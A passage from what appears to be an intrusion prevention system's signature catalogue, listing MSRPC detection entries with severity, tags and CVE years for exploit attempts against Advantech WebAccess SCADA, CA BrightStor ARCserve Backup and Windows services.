MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1178-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1242-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1179-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1209-5242
Vulnerability: Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1208-5242
Last changed: sgpkg-ips-1208-5242
Vulnerability: Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1153-5242
Vulnerability: Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1257-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1086-5242
Last changed: sgpkg-ips-1086-5242
Vulnerability: Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1082-5242
Last changed: sgpkg-ips-1082-5242
Vulnerability: Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Vulnerability: Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow

About this situation: A vulnerability in Advantech WebAccess
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Advantech WebAccess, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1321-5242
Vulnerability: Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1321-5242
Vulnerability: Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Vulnerability: Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Big-Endian-Byte-Order-Used

About this situation: Big endian byte order detected in MSRPC requests, possible IDS evasion attempt
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-302-4219
Last changed: sgpkg-ips-589-5211
Vulnerability: MSRPC-Big-Endian-Byte-Order-Used
Description:
Back to top

MSRPC-TCP_CPS-Bind-Multiple-Interfaces

About this situation: Detected a Microsoft RPC bind to multiple interfaces at once
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-350-4219
Description:
Back to top

MSRPC-TCP_CPS-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against Computer Associates Alert Notification Server detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Computer Associates Protection Suite 3, Computer Associates Threat Manager for the Enterprise, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-Arcserve-Backup-Db-Engine-Denial-Of-Service

About this situation: Attempt to exploit a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup DB Engine detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2008, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC_CA-Arcserve-Backup-Db-Engine-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ARCserve Backup detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2009, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service

About this situation: Attempt to exploit a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine service detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2008, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC_CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Computer Associates BrightStor ARCserve Backup
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2007, Any Operating System not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in Computer Associates ARCserve Backup Message Engine detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-227-3038
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF

About this situation: Detects buffer overflow exploits against the Computer Associates BrightStor ARCserve Backup Message Engine service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2007, Any Operating System not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-Access

About this situation: An access to Computer Associates BrightStor ARCserve Backup Tape Engine detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-589-5211
Vulnerability: CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Call-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Computer Associates BrightStor ARCserve detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Computer Associates Business Protection Suite 2, Computer Associates Server Protection Suite 2, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Generic-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF

About this situation: Detects buffer overflow exploits against CA BrightStor ARCserve Backup
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2006, Any Operating System not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF

About this situation: Detects buffer overflow exploits against Computer Associates BrightStor ARCserve Backup
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2006, Any Operating System not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Backup-Agent-Connection-Id-Buffer-Overflow

About this situation: Detects MSRPC requests that exploit a buffer overflow in the BrightStor Backup Agent
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: CA-BrightStor-Backup-Agent-RPC-Server-Connection-Id-Pointer-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Computer Associates BrightStor ARCserve Backup Message Engine service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC_CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Backup-Tape-Engine-Opcode-191-Function-Access

About this situation: Detects access to a vulnerable function in CA BrightStor Backup Tape Engine MSRPC interface
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-348-4219
Vulnerability: MSRPC_CA-BrightStor-Backup-Tape-Engine-Opcode-191-Code-Execution-Vulnerability
Description:
Back to top

MSRPC-TCP_CPS-CA-BrightStor-Backup-Tape-Engine-Vsprintf-Log-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Computer Associates BrightStor ARCserve Backup Tape Engine service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC_CA-BrightStor-Backup-Tape-Engine-Message-Vsprintf-Log-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-Message-Engine-RPC-Server-Buffer-Overflow

About this situation: Detects code execution execution against Computer Associates Message Engine
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Computer Associates Business Protection Suite 2, Computer Associates Server Protection Suite 2, Computer Associates Business Protection Suite, Computer Associates BrightStor, CVE2006, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-CA-Message-Engine-RPC-Server-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-Microsoft-Windows-WKSSVC-NetrGetJoinInformation-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Windows Workstation Service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-238-3038
Vulnerability: Microsoft-Windows-Workstation-Service-NetrGetJoinInformation-Heap-Corruption
Description:
Back to top

MSRPC-TCP_CPS-CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the Alert Service component used by multiple Computer Associates products detected
Context: MSRPC Client Payload Stream
Severity: 7
